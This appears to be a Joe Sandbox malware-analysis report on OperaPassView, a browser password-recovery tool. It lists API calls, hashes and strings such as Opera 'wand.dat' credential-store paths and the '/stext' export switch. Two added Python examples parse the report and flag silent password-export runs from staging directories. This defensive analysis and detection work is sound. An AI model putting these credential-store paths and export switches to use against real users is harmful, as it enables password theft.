                                        • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: Library$??3@AddressDeleteEnumErrorFreeHandleLoadMessageModeModuleObjectProcResourceTypes
                                        • String ID: $/deleteregkey$/savelangfile
                                        • API String ID: 3591293073-28296030
                                        • Opcode ID: de3f40b4e55eeaaf1dac55b68430880ef7ee47ccc67b33af9c9c8b447cd1d60c
                                        • Instruction ID: b443d161a9bfda6ba7bb93ee09c3e4a052c8ad070ab97aa12102e52f6c463f3b
                                        • Opcode Fuzzy Hash: de3f40b4e55eeaaf1dac55b68430880ef7ee47ccc67b33af9c9c8b447cd1d60c
                                        • Instruction Fuzzy Hash: 4A611C71408345DBD720AF62DE4895FBBE9EFC4344F004A3EF684A2191DB7994158F9A

                                        Control-flow Graph

                                        APIs
                                        • memset.MSVCRT ref: 00408181
                                          • Part of subcall function 00403CE2: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040556D,00000000,00405420,?,00000000,00000208), ref: 00403CED
                                        • wcsrchr.MSVCRT ref: 0040819F
                                        • wcscat.MSVCRT ref: 004081B9
                                        • memset.MSVCRT ref: 00408244
                                        • wcslen.MSVCRT ref: 00408265
                                        • wcslen.MSVCRT ref: 00408274
                                        • wcslen.MSVCRT ref: 004082D3
                                        • wcslen.MSVCRT ref: 004082E2
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
                                        • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmp
                                        • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmp
                                        • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmp
                                        • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: wcslen$memset$FileModuleNamewcscatwcsrchr
                                        • String ID: .cfg$Opera\Opera7\profile\wand.dat$Opera\Opera\wand.dat
                                        • API String ID: 2318608877-1497048727
                                        • Opcode ID: 33e8aad3c5a6076f0ea671c7ce7c09fc12d2d20503ac13a8f891f9da74e1a541
                                        • Instruction ID: 5ce434d71b15ec2f64e036e0180c1da2dfbcaf4792122087830a502de8537aac
                                        • Opcode Fuzzy Hash: 33e8aad3c5a6076f0ea671c7ce7c09fc12d2d20503ac13a8f891f9da74e1a541
                                        • Instruction Fuzzy Hash: 8941CA729003089BDB10EF65D885A8A73B8FF44314F1408BFE559F71C2EB79AA548B8C
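                                        The "APIs" and "String ID" fields of these function blocks follow a fixed textual form: an optional "Part of subcall function ADDR:" prefix, then API.MODULE(arguments), then "ref: ADDR"; String ID joins the function's strings with "$". The following is an added example, not part of this report or of the analysed binary: it parses lines constructed from this page into records and pulls out the string arguments, command-line switches and credential-store paths an analyst would pivot on. The CREDENTIAL_STORE_NAMES list and the comma-splitting of argument lists are this example's own choices, not something the report defines.

```python
"""Parse Joe Sandbox 'APIs' / 'String ID' lines into structured records.

Added example; not part of the sandbox report or of the analysed sample.
SAMPLE is constructed from lines visible on this page.
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional

SAMPLE = r"""
  • Part of subcall function 004022B7: LoadLibraryW.KERNEL32(comctl32.dll), ref: 004022D6
  • Part of subcall function 004022B7: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004022E8
  • Part of subcall function 004022B7: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00402327
• SetErrorMode.KERNELBASE(00008001), ref: 00408D5A
• GetModuleHandleW.KERNEL32(00000000,0040A86C,00000000), ref: 00408D73
• ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,/deleteregkey,/savelangfile), ref: 00408E11
• memset.MSVCRT ref: 00408181
• wcsrchr.MSVCRT ref: 0040819F
• String ID: $/deleteregkey$/savelangfile
• String ID: .cfg$Opera\Opera7\profile\wand.dat$Opera\Opera\wand.dat
"""

# One API line: [Part of subcall function ADDR:] api.MODULE[(args)], ref: ADDR
API_LINE = re.compile(
    r"^\s*•\s*"
    r"(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>[^.\s(]+)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>.*)\))?"
    r"\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)
STRING_ID_LINE = re.compile(r"^\s*•\s*String ID:\s*(?P<ids>.*)$")
HEX32 = re.compile(r"^[0-9A-Fa-f]{8}$")

# File names of browser credential stores to flag (example's own list).
CREDENTIAL_STORE_NAMES = ("wand.dat",)


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str] = field(default_factory=list)
    ref: str = ""                      # address of the call instruction
    subcall_of: Optional[str] = None   # callee whose body contains the call


def split_args(raw: Optional[str]) -> List[str]:
    """Split the printed argument list on commas. A string argument that
    itself contains a comma would be split too; the report gives no quoting."""
    if not raw:
        return []
    return raw.split(",")


def classify(arg: str) -> str:
    """'?' = unresolved, 8 hex digits = number/pointer, anything else = string."""
    if arg == "?":
        return "unknown"
    if HEX32.match(arg):
        return "hex"
    return "string"


def parse_api_lines(text: str) -> List[ApiCall]:
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if m:
            calls.append(ApiCall(m["api"], m["module"], split_args(m["args"]),
                                 m["ref"], m["sub"]))
    return calls


def parse_string_ids(text: str) -> List[str]:
    ids = []
    for line in text.splitlines():
        m = STRING_ID_LINE.match(line)
        if m:
            ids.extend(s for s in m["ids"].split("$") if s)
    return ids


def summarize(text: str) -> dict:
    """Collect what an analyst pivots on: imports, literal strings,
    command-line switches and paths of known credential stores."""
    calls = parse_api_lines(text)
    strings = parse_string_ids(text)
    string_args = [a for c in calls for a in c.args if classify(a) == "string"]
    all_strings = strings + string_args
    return {
        "apis": sorted({f"{c.module}!{c.api}" for c in calls}),
        "strings": strings,
        "string_args": string_args,
        "switches": sorted({s for s in all_strings if s.startswith("/")}),
        "credential_paths": [s for s in all_strings
                             if any(n in s.lower() for n in CREDENTIAL_STORE_NAMES)],
    }


if __name__ == "__main__":
    for key, value in summarize(SAMPLE).items():
        print(f"{key}: {value}")
```

                                        Feeding the whole report text to summarize() gives one pass over every function block; the "credential_paths" list is what links this block to the Opera password-store access the signatures above report.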

                                        Control-flow Graph

                                        Control-flow graph of 40b772 (text-rendered edge list omitted): CRT entry point. call 40b984, GetModuleHandleA; __set_app_type, __p__fmode, __p__commode, optionally __setusermatherr; _initterm, __wgetmainargs, _initterm; GetStartupInfoW; GetModuleHandleA, call 408d32 (the program's main routine); then exit or _cexit, ending with call 40b9bd.
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
                                        • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmp
                                        • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmp
                                        • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmp
                                        • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
                                        • String ID:
                                        • API String ID: 2827331108-0
                                        • Opcode ID: e0c6bfa8702341f2c90823e91bb724e8eadc7258dc9a4fdf4a994c74bbcb6742
                                        • Instruction ID: ab676f94fb741c2de4f94484a28f2edc40db6796b33061c840ac924c3e863e0c
                                        • Opcode Fuzzy Hash: e0c6bfa8702341f2c90823e91bb724e8eadc7258dc9a4fdf4a994c74bbcb6742
                                        • Instruction Fuzzy Hash: D1517F75D00205DBCB21AFA4D988AAD7BB4FB44710F20827BE461B72E1D7784C82CB9D

                                        Control-flow Graph

                                        Control-flow graph of 40aae0 (text-rendered edge list omitted): call 40aab1; then either call 403de2, or memset and call 40a4dd followed by wcscpy, call 40a4f8 and RegCloseKey; finally wcscpy.
                                        APIs
                                          • Part of subcall function 0040AAB1: LoadLibraryW.KERNEL32(shell32.dll,0040AAEF,?), ref: 0040AABF
                                          • Part of subcall function 0040AAB1: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 0040AAD4
                                        • memset.MSVCRT ref: 0040AB1F
                                        • wcscpy.MSVCRT ref: 0040AB43
                                        • RegCloseKey.ADVAPI32(00408257,?,?,?,?,?,?,?,?,?), ref: 0040AB65
                                        • wcscpy.MSVCRT ref: 0040AB74
                                          • Part of subcall function 00403DE2: GetVersionExW.KERNEL32(00410A50,?,0040AAFE,?), ref: 00403DFC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
                                        • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmp
                                        • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmp
                                        • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmp
                                        • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: wcscpy$AddressCloseLibraryLoadProcVersionmemset
                                        • String ID: AppData
                                        • API String ID: 288233908-2707804156
                                        • Opcode ID: 8d49d394efc7713b9456a5529a91419b7c92975be1bbff4b9d4d8043798716bc
                                        • Instruction ID: 285cc4c544a26c6ac391f473c3cfc38f594349739ab536cf3326fa6f296e20f7
                                        • Opcode Fuzzy Hash: 8d49d394efc7713b9456a5529a91419b7c92975be1bbff4b9d4d8043798716bc
                                        • Instruction Fuzzy Hash: 6A01C471801218BADB10F7659C4AEEF777CDB44300F200476FA09B10C2E7796E54DAAB

                                        Control-flow Graph

                                        Control-flow graph of 408ac8 (text-rendered edge list omitted): ??2@YAPAXI@Z twice; call 4056f8 and call 401a12; optionally DeleteObject; then call 403dbc, call 401000, GetModuleHandleW, LoadIconW and call 4016d1.
                                        APIs
                                        • ??2@YAPAXI@Z.MSVCRT(00000220,00000000,?,?,?,00408DCA), ref: 00408AEA
                                        • ??2@YAPAXI@Z.MSVCRT(00001AEC,00000000,?,?,?,00408DCA), ref: 00408B0C
                                        • DeleteObject.GDI32(?), ref: 00408B58
                                        • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,?,00408DCA), ref: 00408BA0
                                        • LoadIconW.USER32(00000000,00000065), ref: 00408BA9
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
                                        • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmp
                                        • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmp
                                        • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmp
                                        • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: ??2@$DeleteHandleIconLoadModuleObject
                                        • String ID:
                                        • API String ID: 659443934-0
                                        • Opcode ID: 660448ec29b933ae47869e628f782440b5c7a0053d3100fe72f0c838a0ebb1a0
                                        • Instruction ID: 5d30767ec0c00a9ff56c1776cbe2dae35935defb109371278764e22d2acb7e78
                                        • Opcode Fuzzy Hash: 660448ec29b933ae47869e628f782440b5c7a0053d3100fe72f0c838a0ebb1a0
                                        • Instruction Fuzzy Hash: A92139B1901249DFCB70AFB99C896D977A8FF44314F108A3FE90CEB281DB7955108B58

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 171 40a7e6-40a7fd FindResourceW 172 40a864-40a869 171->172 173 40a7ff-40a80e SizeofResource 171->173 174 40a810-40a81c LoadResource 173->174 175 40a863 173->175 174->175 176 40a81e-40a827 LockResource 174->176 175->172 176->175 177 40a829-40a837 176->177 178 40a855-40a85e 177->178 179 40a839 177->179 178->175 180 40a83a-40a852 179->180 180->180 181 40a854 180->181 181->178
                                        APIs
                                        • FindResourceW.KERNELBASE(?,?,?), ref: 0040A7F3
                                        • SizeofResource.KERNEL32(?,00000000), ref: 0040A804
                                        • LoadResource.KERNEL32(?,00000000), ref: 0040A814
                                        • LockResource.KERNEL32(00000000), ref: 0040A81F
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: Resource$FindLoadLockSizeof
                                        • String ID:
                                        • API String ID: 3473537107-0
                                        • Opcode ID: c456b9334452d35e45e3ecd944d806d125ba2c6968af7380ccb795f94074ae4c
                                        • Instruction ID: 6c7702eab830fa794dbe4d4f612f035a24f1c300b0a6ce6b495dcb88548036a5
                                        • Opcode Fuzzy Hash: c456b9334452d35e45e3ecd944d806d125ba2c6968af7380ccb795f94074ae4c
                                        • Instruction Fuzzy Hash: BB018833600315EBCB195FA5DD8595B7F5EFF85290708C136F809EA2A0D770C951D688

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 182 40493d-404944 183 40494a-4049d9 ??2@YAPAXI@Z * 4 182->183 184 4049de 182->184 183->184
                                        APIs
                                        • ??2@YAPAXI@Z.MSVCRT(00000000,004049ED,004020A6,OperaPassView), ref: 00404977
                                        • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,004049ED,004020A6,OperaPassView), ref: 00404995
                                        • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,004049ED,004020A6,OperaPassView), ref: 004049B3
                                        • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,004049ED,004020A6,OperaPassView), ref: 004049D1
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: ??2@
                                        • String ID:
                                        • API String ID: 1033339047-0
                                        • Opcode ID: d78e13eaeaa92522975b109eca75e478145f83747a9411d93f1e62bee6f41732
                                        • Instruction ID: b3cae04eb33b1d64d1131991b9440b615a7550b70ba3bdc0b761ddafc789e2f0
                                        • Opcode Fuzzy Hash: d78e13eaeaa92522975b109eca75e478145f83747a9411d93f1e62bee6f41732
                                        • Instruction Fuzzy Hash: 40011EB66412407EEB589B38ED177AAA6E4E78D344F04863FA306CE2F4EB7544008B4C

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 185 408c56-408c86 call 401dc8 188 408d28-408d31 185->188 189 408c8c-408c95 185->189 190 408ca2 189->190 191 408c97-408ca0 call 40454d 189->191 193 408ca7-408cb6 _wcsicmp 190->193 191->193 195 408cb8-408cb9 193->195 196 408cbb-408cc2 call 408bc0 193->196 197 408cc4-408cc8 195->197 196->197 199 408ccb-408cd8 196->199 197->199 199->189 201 408cda-408cdf 199->201 201->188 202 408ce1-408cf9 call 408150 call 4078e5 201->202 207 408d04 202->207 208 408cfb-408d02 call 40454d 202->208 210 408d09-408d14 call 406eee 207->210 208->210 213 408d19-408d23 call 408409 210->213 213->188
                                        APIs
                                        • _wcsicmp.MSVCRT ref: 00408CAD
                                          • Part of subcall function 00408BC0: _wcsicmp.MSVCRT ref: 00408BC6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: _wcsicmp
                                        • String ID: /stext
                                        • API String ID: 2081463915-3817206916
                                        • Opcode ID: 64707a9a51d8eba358d02dd674303af0b4e945527d11ee965fa2c5d6d56f0a03
                                        • Instruction ID: 6c959480c053d333f8a6b6221491e3d2ceffcc90531821a7b641c9a82b32392d
                                        • Opcode Fuzzy Hash: 64707a9a51d8eba358d02dd674303af0b4e945527d11ee965fa2c5d6d56f0a03
                                        • Instruction Fuzzy Hash: 672171312142049FD700AF579981A5A37E5EFD4318F10447FF899BF282DF79A8018B6A
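The routine above walks the command-line tokens and compares each one with `_wcsicmp` against `/stext`, so the switch is accepted in any letter case before the save path (the `CreateFileW` with `CREATE_ALWAYS` and the `WriteFile` further down) is taken. A detection engineer can turn that into a process-creation check. The following is an added example written for this report; it is not Joe Sandbox or NirSoft code. Only `/stext` appears in the report; the other entries in `EXPORT_SWITCHES` are NirSoft's documented save switches and are an assumption, as are the `SUSPICIOUS_DIRS` list and the constructed sample events.

```python
"""Flag process-creation events in which a NirSoft-style recovery tool is
driven non-interactively to export what it recovered to a file.

Added example for this report, not Joe Sandbox or NirSoft code.  The report
shows /stext matched with _wcsicmp (case-insensitive); the other switches
below are NirSoft's documented save formats (assumption).  SUSPICIOUS_DIRS
and SAMPLE_EVENTS are constructed for the example, not captured telemetry."""
import shlex
from typing import Dict, List, Optional

EXPORT_SWITCHES = {"/stext", "/stab", "/scomma", "/stabular",
                   "/shtml", "/sverhtml", "/sxml"}
# Staging directories an interactive user rarely runs a recovery tool from.
SUSPICIOUS_DIRS = ("\\appdata\\local\\temp\\", "\\users\\public\\",
                   "\\programdata\\", "\\windows\\temp\\")
SCRIPT_HOSTS = ("\\cmd.exe", "\\powershell.exe", "\\wscript.exe", "\\cscript.exe")

SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"image": r"C:\Users\Public\opv.exe",
     "cmdline": r'"C:\Users\Public\opv.exe" /STEXT "C:\Users\Public\opera.txt"',
     "parent": r"C:\Windows\System32\cmd.exe"},
    {"image": r"C:\Tools\NirSoft\OperaPassView.exe",
     "cmdline": r"OperaPassView.exe /stext C:\Tools\report.txt",
     "parent": r"C:\Windows\explorer.exe"},
    {"image": r"C:\Windows\System32\ping.exe",
     "cmdline": "ping -n 5 127.0.0.1",
     "parent": r"C:\Windows\System32\cmd.exe"},
]


def split_cmdline(cmdline: str) -> List[str]:
    """Windows-style tokenising: double quotes group, backslashes are literal."""
    return [tok.strip('"') for tok in shlex.split(cmdline, posix=False)]


def analyze_event(event: Dict[str, str]) -> Optional[Dict[str, object]]:
    """Return a finding when an export switch is present, else None."""
    tokens = split_cmdline(event["cmdline"])
    for idx, tok in enumerate(tokens):
        if tok.lower() in EXPORT_SWITCHES:      # mirrors the _wcsicmp compare
            break
    else:
        return None
    switch = tokens[idx].lower()
    output = tokens[idx + 1] if idx + 1 < len(tokens) else None
    reasons = [f"export switch {switch} on the command line"]
    if any(d in event["image"].lower() for d in SUSPICIOUS_DIRS):
        reasons.append("image runs from a user-writable staging directory")
    if output and any(d in output.lower() for d in SUSPICIOUS_DIRS):
        reasons.append("output file is written to a staging directory")
    if event.get("parent", "").lower().endswith(SCRIPT_HOSTS):
        reasons.append("launched by a scripting host rather than the shell")
    severity = "high" if len(reasons) >= 3 else "medium" if len(reasons) == 2 else "low"
    return {"switch": switch, "output": output,
            "severity": severity, "reasons": reasons}


def scan(events: List[Dict[str, str]]) -> List[Dict[str, object]]:
    """Findings for every event that carries an export switch."""
    return [f for f in (analyze_event(e) for e in events) if f is not None]


if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding["severity"], finding["switch"], finding["output"])
        for reason in finding["reasons"]:
            print("   -", reason)
```

The second sample event (an administrator's own copy, run from a tools directory, launched from Explorer) is kept at low severity on purpose: the switch alone is how the tool is meant to be used, and the staging directory and scripting-host parent are what separate the dropped copy from a legitimate one.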

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 215 40a764-40a775 216 40a786-40a793 GetPrivateProfileStringW 215->216 217 40a777-40a784 WritePrivateProfileStringW 215->217 218 40a799-40a79d 216->218 217->218
                                        APIs
                                        • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0040A77E
                                        • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 0040A793
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: PrivateProfileString$Write
                                        • String ID:
                                        • API String ID: 2948465352-0
                                        • Opcode ID: f4a82916b1e0431dc8ece45825df8e7d6a171639940823de7da9e9e15d1772e4
                                        • Instruction ID: 40d9067811e5fdefbedcbc10adba8553b8dd249bfe1a2ca3aad13c684c334763
                                        • Opcode Fuzzy Hash: f4a82916b1e0431dc8ece45825df8e7d6a171639940823de7da9e9e15d1772e4
                                        • Instruction Fuzzy Hash: 4AE0E53604020DFBCF018FA0DD88EEA3B79AB08308F04C529BA1999061C736C536EBA5

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 219 40a4ac-40a4b6 220 40a4b8-40a4c9 call 40a3b9 219->220 221 40a4ca-40a4dc GetPrivateProfileIntW 219->221
                                        APIs
                                        • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 0040A4D3
                                          • Part of subcall function 0040A3B9: memset.MSVCRT ref: 0040A3D8
                                          • Part of subcall function 0040A3B9: _itow.MSVCRT ref: 0040A3EF
                                          • Part of subcall function 0040A3B9: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 0040A3FE
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: PrivateProfile$StringWrite_itowmemset
                                        • String ID:
                                        • API String ID: 4232544981-0
                                        • Opcode ID: 965a588e9c93152147c1e3fa739ecc5a5bb65bfc638b42a4412db2d146051a2a
                                        • Instruction ID: 18a49fe9df3f170761e63d2b61cf9b5c2f74bedf8807eb1637f337264b4ddbe6
                                        • Opcode Fuzzy Hash: 965a588e9c93152147c1e3fa739ecc5a5bb65bfc638b42a4412db2d146051a2a
                                        • Instruction Fuzzy Hash: D9E0BD3200020DEBDF125F90EC05AAA3BA6FF14315F24866AFE5C24160D37295B0EB89

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 224 40429d-4042bb WriteFile
                                        APIs
                                        • WriteFile.KERNELBASE(?,?,00000000,00000000,00000000,?,?,00401E28,?,?,00000000,?), ref: 004042B4
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: FileWrite
                                        • String ID:
                                        • API String ID: 3934441357-0
                                        • Opcode ID: f7cb4ad073e445e46a170c7d98e7b835c3a4e02ef0d256329d2e1587878cb5e6
                                        • Instruction ID: 44ca31bac7325476affb0a5a8a4e30de110c9927306568b9f6297b12081be1b6
                                        • Opcode Fuzzy Hash: f7cb4ad073e445e46a170c7d98e7b835c3a4e02ef0d256329d2e1587878cb5e6
                                        • Instruction Fuzzy Hash: 09D0923511020DFBDF018F80DD06B997BA9EB04359F104054BA04A5060C7B59A10AB54

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 225 403979-403991 CreateFileW
                                        APIs
                                        • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000002,00000000,00000000,00406D71,?), ref: 0040398B
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: CreateFile
                                        • String ID:
                                        • API String ID: 823142352-0
                                        • Opcode ID: 70c5500d9cdd9ab5da579220ae7798c66593d576d3ca681fc37e6930cfdfa8a3
                                        • Instruction ID: bc3eb4ca2c7e2e880f5dea7d521545ca3cd7666ee5b46d0ef391399bf6367a8f
                                        • Opcode Fuzzy Hash: 70c5500d9cdd9ab5da579220ae7798c66593d576d3ca681fc37e6930cfdfa8a3
                                        • Instruction Fuzzy Hash: 54C012F0250302FEFF204B10AD4AF37395DE780704F2084207E00F40E1D2B14C41D924

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 226 40a86c-40a884 EnumResourceNamesW
                                        APIs
